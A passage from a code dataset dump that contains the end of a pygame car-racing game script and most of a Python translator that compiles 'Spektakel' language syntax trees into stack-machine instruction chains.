points.add(C1)\r\n all_sprites.add(C1)\r\n\r\n #To be run if collision occurs between Player and Enemy\r\n\r\n if pygame.sprite.spritecollideany(P1, enemies):\r\n pygame.mixer.music.stop() # stop the background music \r\n pygame.mixer.Sound('crash.wav').play() # playing a crash music \r\n time.sleep(1)\r\n \r\n DISPLAYSURF.fill(RED) # fill to the red \r\n # blitting surface\r\n DISPLAYSURF.blit(game_over, (30,250))\r\n \r\n pygame.display.update() # updating the display!!!\r\n for entity in all_sprites:\r\n entity.kill() # killing the sprite objects \r\n time.sleep(2)\r\n pygame.quit() # quit the pygame \r\n sys.exit() # exit frm python\r\n \r\n pygame.display.update()\r\n FramePerSec.tick(FPS)\r\n", "repo_name": "Murapov11/Python", "sub_path": "LAB8/racer.py", "file_name": "racer.py", "file_ext": "py", "file_size_in_byte": 5433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 58, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.USEREVENT", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 152, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 153, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 166, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 166, "usage_type": "attribute"}]} +{"seq_id": "69991539050", "text": "import io\nfrom collections import namedtuple\n\nfrom engine.functional import terms\nfrom engine.functional.reference import ReturnValueReference, ExceptionReference, NameReference, FrameReference, \\\n AbsoluteFrameReference\nfrom engine.functional.terms import ComparisonOperator, BooleanBinaryOperator, TRef, UnaryOperator, Read, NewDict, \\\n NewProcedure, CTerm, Lookup, CString\nfrom engine.functional.values import VReturnError, VBreakError, VContinueError, VDict, VProcedure\nfrom engine.tasks.instructions import Push, Pop, Launch, Update, Guard, StackProgram, ProgramLocation\nfrom lang.translator import Translator\nfrom util import check_type\nfrom .ast import Pass, Constant, Identifier, Attribute, Tuple, Projection, Call, Launch, Await, Comparison, \\\n BooleanBinaryOperation, UnaryOperation, ArithmeticBinaryOperation, ImportNames, ImportSource, \\\n ExpressionStatement, Assignment, Block, Return, Raise, Break, \\\n Continue, Conditional, While, For, Try, VariableDeclaration, ProcedureDefinition, \\\n PropertyDefinition, ClassDefinition, AssignableExpression\nfrom ..modules import ModuleSpecification\n\n\ndef negate(bexp):\n return terms.UnaryOperation(UnaryOperator.NOT, bexp)\n\n\nclass Chain:\n \"\"\"\n Represents a sequence of instructions. Control flow can enter this chain only at its start.\n \"\"\"\n def __init__(self):\n self._proto = []\n self._targets = set()\n self._can_continue = True\n\n def __hash__(self):\n return hash(tuple(t for t, *_ in self._proto))\n\n def _equals(self, other, bijection=None):\n if bijection is None:\n bijection = {}\n if not (self._can_continue == other._can_continue and len(self._proto) == len(other._proto)):\n return False\n try:\n return bijection[self] is other\n except KeyError:\n bijection[self] = other\n for (t1, *args1), (t2, *args2) in zip(self._proto, other._proto):\n if t1 is not t2:\n return False\n for a1, a2 in zip(args1, args2):\n if isinstance(a1, Chain):\n if not a1._equals(a2, bijection=bijection):\n return False\n elif isinstance(a1, list):\n assert t1 is Update\n if tuple(a1) != tuple(a2):\n return False\n elif isinstance(a1, dict):\n assert t1 is Guard\n if len(a1) != len(a2):\n return False\n for k, v in a1.items():\n try:\n if v != a2[k]:\n return False\n except KeyError:\n return False\n else:\n if not a1 == a2:\n return False\n return False\n\n def __eq__(self, other):\n return isinstance(other, Chain) and self._equals(other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __add__(self, other):\n if not isinstance(other, Chain):\n raise TypeError(\"Chains can only be extended by other chains!\")\n self._assert_continuable()\n s = Chain()\n s._proto = self._proto + other._proto\n s._targets = self._targets | other._targets\n s._can_continue = other._can_continue\n return s\n\n def __str__(self):\n t2s = {Update: \"Update\", Guard: \"Guard\", Push: \"Push\", Pop: \"Pop\", Launch: \"Launch\"}\n newline = \"\"\n with io.StringIO() as s:\n for t, *args in self._proto:\n s.write(newline)\n newline = \"\\n\"\n s.write(t2s[t])\n prefix = \": \"\n for a in args:\n s.write(prefix)\n s.write(str(a))\n prefix = \", \"\n return s.getvalue()\n\n def __len__(self):\n return len(self._proto)\n\n def _assert_continuable(self):\n if self._proto is None:\n raise RuntimeError(\"This chain has been finalized and cannot be modified anymore!\")\n if not self._can_continue:\n raise RuntimeError(\"This chain cannot be extended, because of the type of its last instruction!\")\n\n def append_update(self, ref, expression, on_error):\n \"\"\"\n Appends a prototype of an update instruction to this chain.\n :param ref: An Expression specifying which part of the state is to be updated.\n :param expression: The Expression object specifying how to compute the new value.\n :param on_error: The chain to jump to if the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Update, ref, expression, on_error))\n self._targets.add(on_error)\n\n def append_guard(self, alternatives, on_error):\n \"\"\"\n Appends a prototype of a guard instruction to this chain. The chain cannot be continued after a guard\n instruction.\n :param alternatives: A mapping from Expressions to Chains, specifying to which chain to jump under which\n condition.\n :param on_error: The chain to jump to in case the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Guard, alternatives, on_error))\n for _, t in alternatives.items():\n self._targets.add(t)\n self._targets.add(on_error)\n self._can_continue = False\n\n def append_jump(self, target):\n \"\"\"\n Appends a prototype of an unconditional jump instruction to this chain.\n The chain cannot be continued after this.\n :param target: The chain to jump to.\n \"\"\"\n # According to the semantics, there cannot be an error in evaluating Truth():\n self.append_guard({terms.CBool(True): target}, None)\n\n def append_push(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Push instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Push, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def append_pop(self):\n \"\"\"\n Appends a prototype of a Pop instruction to this chain.\n The chain cannot be continued after a pop instruction.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Pop, ))\n self._can_continue = False\n\n def append_launch(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Launch instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Launch, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def compile(self):\n \"\"\"\n Compiles this chain and the chains it may jump to into a StackProgram.\n :return: A StackProgram object.\n \"\"\"\n\n offset = 0\n entries = {}\n chains = [self]\n\n while len(chains) > 0:\n c = chains.pop()\n if c in entries:\n continue\n entries[c] = offset\n offset += len(c)\n chains.extend((t for t in c._targets if t is not None))\n\n instructions = []\n offset = 0\n\n for c in entries.keys(): # Enumerates the chains in the order they were inserted, guaranteeing that they start\n # exactly at the recorded offsets.\n for t, *args in c._proto:\n\n if t is Pop:\n instructions.append(Pop())\n\n else:\n *args, on_error = args\n if on_error is None:\n on_error = -1\n else:\n on_error = entries[on_error]\n\n if t is Update:\n ref, expression = args\n instructions.append(Update(ref, expression, offset + 1, on_error))\n elif t is Guard:\n alternatives, = args\n instructions.append(Guard({condition: entries[chain] for condition, chain in alternatives.items()}, on_error))\n elif t is Push:\n entry, expressions = args\n instructions.append(Push(entry, expressions, offset + 1, on_error))\n elif t is Launch:\n entry, expressions = args\n instructions.append(Launch(entry, expressions, offset + 1, on_error))\n else:\n raise NotImplementedError(\"Bug in Chain.compile: The instruction type {} \"\n \"has not been taken into account for compilation yet!\".format(t))\n offset += 1\n\n if c._can_continue:\n instructions.append(Guard({}, offset))\n offset += 1\n\n return StackProgram(instructions)\n\n\nclass BlockStack:\n \"\"\"\n Models a stack to which information about syntactic blocks can be pushed during code generation.\n \"\"\"\n\n LoopBlock = namedtuple(\"LoopBlock\", (\"headChain\", \"successorChain\"))\n ExceptionBlock = namedtuple(\"ExceptionBlock\", (\"exceptionReference\", \"finallyChain\"))\n FunctionBlock = namedtuple(\"FunctionBlock\", (\"offset\", ))\n ClassBlock = namedtuple(\"ClassBlock\", (\"offset\", ))\n ModuleBlock = namedtuple(\"ModuleBlock\", (\"offset\", ))\n\n def __init__(self):\n super().__init__()\n self._entries = []\n\n def push(self, entry):\n \"\"\"\n Pushes an entry to the top of the stack.\n :param entry: The entry to push.\n \"\"\"\n self._entries.append(entry)\n\n def pop(self):\n \"\"\"\n Removes the latest entry from the stack.\n :return: The entry that was popped.\n \"\"\"\n return self._entries.pop()\n\n @property\n def top(self):\n \"\"\"\n The entry on the top of the stack.\n \"\"\"\n return self._entries[-1]\n\n def __getitem__(self, idx):\n return self._entries[idx]\n\n def __setitem__(self, key, value):\n self._entries[key] = value\n\n def __iter__(self):\n return reversed(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass Spektakel2Stack(Translator):\n \"\"\"\n A translator that translates Spektakel AST nodes into stack programs.\n \"\"\"\n\n def __init__(self, builtin):\n \"\"\"\n Initializes a new translator.\n :param builtin: An iterable of BuiltinModuleSpecification objects that define identifiers that are to be\n builtin, i.e. valid without any explicit definition or import.\n \"\"\"\n super().__init__()\n self._decl2ref = {} # Maps declaration nodes to references.\n self._blocks = BlockStack()\n self._import_procedure = None\n self._builtin = list(builtin)\n\n def declare_name(self, chain, name, on_error):\n \"\"\"\n Statically declares a new variable name. Depending on the context the name will be declared as a stack frame\n variable, or as a namespace entry. The new variable is recorded for the given declaration, such that it can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variable should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param name: Either an AST node, or a string, under which the reference generated by this call can be retrieved\n later. It may be None, in which case an anonymous local variable is allocated on the stack.\n :return: A Reference object that represents the newly allocated variable.\n \"\"\"\n\n blocks_iter = iter(self._blocks)\n\n try:\n idx, top = 0, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n if name is None:\n pass\n elif isinstance(name, str):\n pass\n elif isinstance(name, Identifier):\n name = name.name\n elif isinstance(name, ProcedureDefinition):\n name = name.name\n elif isinstance(name, PropertyDefinition):\n name = name.name\n elif isinstance(name, ClassDefinition):\n name = name.name\n else:\n raise TypeError(f\"Cannot declare names for objects of type {type(name)}!\")\n\n while True:\n if isinstance(top, BlockStack.FunctionBlock) \\\n or (name is None and isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock))):\n # We are declaring a local variable in the stack frame (either for a function, or in a class/module\n # definition, in which an anonymous variable is needed).\n # The stack frame always has the same layout for all invocations of that function/declaration,\n # so we just add one more variable to that layout.\n offset = top.offset\n self._blocks[idx] = type(top)(offset + 1)\n r = FrameReference(offset)\n self._decl2ref[name] = r\n return r\n elif isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n # We are declaring a class/module member. We know that the class/module definition code is\n # running under a stack frame that has a Namespace object at offset 0. That object needs to be extended.\n slot = FrameReference(0)\n r = NameReference(slot, name)\n chain.append_update(TRef(r), terms.CNone(), on_error)\n self._decl2ref[name] = r\n return r\n else:\n try:\n idx, top = idx + 1, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n def decl2ref(self, name):\n \"\"\"\n Retrieves the reference that was created for the given name.\n :param name: Either an AST node, or a string, for which declare_name has been called.\n :return: A Reference object.\n \"\"\"\n try:\n return self._decl2ref[name]\n except KeyError:\n if isinstance(name, Identifier):\n return self._decl2ref[name.name]\n raise\n\n def declare_pattern(self, chain, pattern, on_error):\n \"\"\"\n Statically declares new variable names for an entire pattern of names.\n Depending on the context the names will be declared as stack frame\n variables, or as a namespace entries. The new variables are recorded for the given pattern, such that they can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variables should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param pattern: The AssignableExpression node holding the pattern expression for which to allocate new variables.\n \"\"\"\n\n if isinstance(pattern, Identifier):\n self.declare_name(chain, pattern, on_error)\n elif isinstance(pattern, AssignableExpression):\n for c in pattern.children:\n self.declare_pattern(chain, c, on_error)\n else:\n raise TypeError(\"Patterns to be declared must only contain AssignableExpression nodes,\"\n \" not nodes of type {}!\".format(type(pattern)))\n\n def emit_assignment(self, chain, pattern, dec, expression, on_error, declaring=False):\n \"\"\"\n Emits VM code for a assigning the result of an expression evaluation to a pattern.\n :param chain: The chain to which the assignment should be appended.\n :param pattern: An AssignableExpression to which a value should be assigned.\n :param dec: A dict mapping AST nodes to decorations.\n :param expression: The expression the result of which is to be assigned.\n :param on_error: The chain that execution should jump to in case of an error.\n :param declaring: Specifies if this assignment is part of a declaration, in which case it is assumed that\n the given pattern is a *defining* occurrence of the declared name, not a *using* one.\n The difference between these cases is that *using* occurrences will be mapped to defining\n ones first, before the runtime reference for them can be retrieved.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n # First we evaluate the expression:\n t, chain = self.translate_expression(chain, expression, dec, on_error)\n\n def assign(chain, pattern, t, on_error):\n if isinstance(pattern, Identifier):\n if not declaring:\n pattern = dec[pattern][1]\n r = self.decl2ref(pattern)\n chain.append_update(TRef(r), t, on_error)\n return chain\n elif isinstance(pattern, Tuple):\n # FIXME: What we are doing here will not work if t represents a general iterable! For that we would\n # need to call a procedure first that turns it into a sequence.\n for idx, c in enumerate(pattern.children):\n chain = assign(chain, c, terms.Project(t, terms.CInt(idx)), on_error)\n elif isinstance(pattern, Projection):\n callee, chain = self.translate_expression(chain, Attribute(pattern.value, \"__set_item__\"), dec, on_error)\n index, chain = self.translate_expression(chain, pattern.index, dec, on_error)\n return self.emit_call(chain, callee, [index, t], on_error)\n elif isinstance(pattern, Attribute):\n # Python's \"Descriptor How-To Guide\"\n # (https://docs.python.org/3/howto/descriptor.html#overview-of-descriptor-invocation)\n # lists the following procedure for attribute lookup:\n # def object_getattribute(obj, name):\n # \"Emulate PyObject_GenericGetAttr() in Objects/object.c\"\n # null = object()\n # objtype = type(obj)\n # cls_var = find_name_in_mro(objtype, name, null)\n # descr_get = getattr(type(cls_var), '__get__', null)\n # if descr_get is not null:\n # if (hasattr(type(cls_var), '__set__')\n # or hasattr(type(cls_var), '__delete__')):\n # return descr_get(cls_var, obj, objtype) # data descriptor\n # if hasattr(obj, '__dict__') and name in vars(obj):\n # return vars(obj)[name] # instance variable\n # if descr_get is not null:\n # return descr_get(cls_var, obj, objtype) # non-data descriptor\n # if cls_var is not null:\n # return cls_var # class variable\n # raise AttributeError(name)\n\n # We do not have general descriptors, but we have properties (which are data descriptors) and we have\n # methods (which are non-data descriptors). Hence for us the procedure above becomes this:\n\n a, chain = self.translate_expression(chain, pattern.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.StoreAttrCase(a, pattern.name), on_error)\n\n csetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISCALLABLE, r)\n cexception = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISEXCEPTION, r)\n cupdate = ~(csetter | cexception)\n\n setter = Chain()\n update = Chain()\n exception = Chain()\n successor = Chain()\n chain.append_guard({csetter: setter, cupdate: update, cexception: exception}, on_error)\n\n self.emit_call(setter, r, [t], on_error)\n setter.append_jump(successor)\n\n update.append_update(r, t, on_error)\n update.append_jump(successor)\n\n exception.append_update(ExceptionReference(), r, on_error)\n exception.append_jump(on_error)\n\n return successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(pattern, AssignableExpression):\n raise NotImplementedError(\"Assignment to patterns of type {} \"\n \"has not been implemented yet!\".format(type(pattern)))\n else:\n raise TypeError(\"The pattern to which a value is assigned must be an \"\n \"AssignableExpression, not a {}!\".format(type(pattern)))\n\n return assign(chain, pattern, t, on_error)\n\n def emit_import(self, chain, spec, subnames, name, mapping, on_error):\n \"\"\"\n Emits code for an import.\n :param chain: The chain to which the import should be appended.\n :param spec: The ModuleSpecification for the module to import.\n :param name: The name the imported module should be bound to, unless the name is None.\n :param subnames: The chain of submodule names to follow from the root module. This must be an iterable of\n strings, that can be empty.\n :param mapping: A mapping from string names to be defined by this import statement to string names defined\n in the imported module.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n check_type(spec, ModuleSpecification)\n\n module = spec.resolve()\n\n m, chain = self.emit_call(chain, CTerm(self._import_procedure),\n [CTerm(ProgramLocation(module, 0))], on_error)\n\n m = TRef(m)\n\n for a in subnames:\n m = terms.Lookup(m, CString(a))\n\n if name is not None:\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), m, on_error)\n\n for name, member in mapping.items():\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), Lookup(m, CString(member)), on_error)\n\n return chain\n\n def emit_call(self, chain, callee, args, on_error):\n \"\"\"\n Emits VM code for a procedure call.\n :param chain: The chain to which the call should be appended.\n :param callee: A Term object representing the procedure to be called.\n :param args: An iterable of term objects representing the arguments to the call.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: A pair (t, c), where t is the term representing the return value of the call and c is the chain\n in which execution is to be continued after the call.\n \"\"\"\n\n # Make sure that the right number of arguments is being used:\n call = Chain()\n argc_error = Chain()\n argc_error.append_update(TRef(ExceptionReference()), terms.NewTypeError(\"Wrong number of arguments for call!\"), on_error)\n argc_error.append_jump(on_error)\n match = terms.Comparison(ComparisonOperator.EQ, terms.NumArgs(callee), terms.CInt(len(args)))\n chain.append_guard({match: call, negate(match): argc_error}, on_error)\n\n call.append_push(callee, args, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n call.append_guard({negate(noerror): on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(TRef(rv), terms.Read(TRef(rr)), on_error)\n return rv, successor\n\n def translate_expression(self, chain, node, dec, on_error):\n \"\"\"\n Translates an AST expression into a machine expression.\n :param node: An AST node representing an expression.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A pair (t, c), where t is the term representing the result of expression evaluation and c is the chain\n in which execution is to be continued after evaluation of the expression.\n \"\"\"\n\n if isinstance(node, Constant):\n value = dec[node]\n if isinstance(value, bool):\n return (terms.CBool(True) if value == True else terms.CBool(False)), chain\n elif isinstance(value, str):\n return terms.CString(value), chain\n elif value is None:\n return terms.CNone(), chain\n elif isinstance(value, int):\n return terms.CInt(value), chain\n elif isinstance(value, float):\n return terms.CFloat(value), chain\n else:\n raise NotImplementedError(\"Translation of constant expressions of type {}\"\n \" has not been implemented!\".format(type(value)))\n elif isinstance(node, Identifier):\n return Read(CTerm(self.decl2ref(dec[node][1]))), chain\n elif isinstance(node, Attribute):\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.LoadAttrCase(v, node.name), on_error)\n\n cgetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISGETTER, r)\n\n getter = Chain()\n successor = Chain()\n chain.append_guard({cgetter: getter, ~cgetter: successor}, on_error)\n\n v, getter = self.emit_call(getter, r, [], on_error)\n getter.append_update(r, v, on_error)\n getter.append_jump(successor)\n\n return r, successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(node, Call):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n return self.emit_call(chain, callee, args, on_error)\n elif isinstance(node, Launch):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n chain.append_launch(callee, args, on_error)\n t = self.declare_name(chain, None, on_error)\n chain.append_update(t, terms.Read(ReturnValueReference()), on_error)\n return t, chain\n elif isinstance(node, Await):\n t = self.translate_expression(chain, node.process, dec, on_error)\n successor = Chain()\n complete = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISTERMINATED, t)\n chain.append_guard({complete: successor}, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(ExceptionReference()), terms.CNone())\n chain.append_guard({~noerror: on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(rv, terms.Read(rr), on_error)\n successor.append_update(rr, terms.CNone(), on_error)\n return rv, successor\n elif isinstance(node, Projection):\n idx, chain = self.translate_expression(chain, node.index, dec, on_error)\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(v, \"__get_item__\"), dec, on_error)\n return self.emit_call(chain, callee, [idx], on_error)\n elif isinstance(node, UnaryOperation):\n return terms.UnaryOperation(node.operator, self.translate_expression(chain, node.operand, dec, on_error)), chain\n elif isinstance(node, ArithmeticBinaryOperation):\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n right, chain = self.translate_expression(chain, node.right, dec, on_error)\n return terms.ArithmeticBinaryOperation(node.operator, left, right), chain\n elif isinstance(node, Comparison):\n return terms.Comparison(node.operator,\n self.translate_expression(chain, node.left, dec, on_error),\n self.translate_expression(chain, node.right, dec, on_error)), chain\n elif isinstance(node, BooleanBinaryOperation):\n # Note: Like in Python, we want AND and OR to be short-circuited. This means that we require some control\n # flow in order to possibly skip the evaluation of the right operand.\n\n v = self.declare_name(chain, None, on_error)\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n chain.append_update(v, left, on_error)\n\n rest = Chain()\n successor = Chain()\n\n if node.operator == BooleanBinaryOperator.AND:\n skip = ~terms.Read(v)\n elif node.operator == BooleanBinaryOperator.OR:\n skip = terms.Read(v)\n else:\n skip = terms.CBool(False)\n\n chain.append_guard({skip: successor, ~skip: rest})\n\n right, rest = self.translate_expression(rest, node.right, dec, on_error)\n chain.append_update(v, terms.BooleanBinaryOperation(node.operator, terms.Read(v), right), on_error)\n chain.append_jump(successor)\n return terms.Read(v), successor\n elif isinstance(node, Tuple):\n return terms.NewTuple(*(self.translate_expression(chain, c, dec, on_error) for c in node.children)), chain\n else:\n raise NotImplementedError()\n\n def emit_return(self, on_error, chain=None):\n \"\"\"\n Emits code for a return statement, under the assumption that the return value has already been set for the task.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or arrive at the function body:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VReturnError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.FunctionBlock):\n break\n\n # We made it to the function level without hitting an exception block.\n chain.append_update(TRef(ExceptionReference()), terms.CNone(), on_error=on_error)\n chain.append_pop()\n\n return chain\n\n def emit_break(self, on_error, chain=None):\n \"\"\"\n Emits code for a break statement.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VBreakError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.successorChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def emit_continue(self, on_error, chain=None):\n \"\"\"\n Emits code for a continue statement.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VContinueError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.headChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def _emit_procedure(self, chain, name, argnames, body, dec, on_error):\n \"\"\"\n Emits code for a procedure declaration.\n :param name: The AST node representing the name of the procedure.\n :param argnames: A tuple of AST nodes representing the argument names of the procedure.\n :param body: The AST node representing the body of the procedure.\n :param dec:\n :param on_error:\n :return: A pair (v, c), where v is a Term representing the procedure object and c is the chain to which code\n following the procedure definition can be appended.\n \"\"\"\n\n bodyBlock = Chain()\n exitBlock = Chain()\n\n num_args = len(argnames)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n\n # Declare the function arguments as local variables:\n for aname in argnames:\n self.declare_pattern(bodyBlock, aname, on_error)\n\n body = self.translate_statement(bodyBlock, body, dec, exitBlock)\n 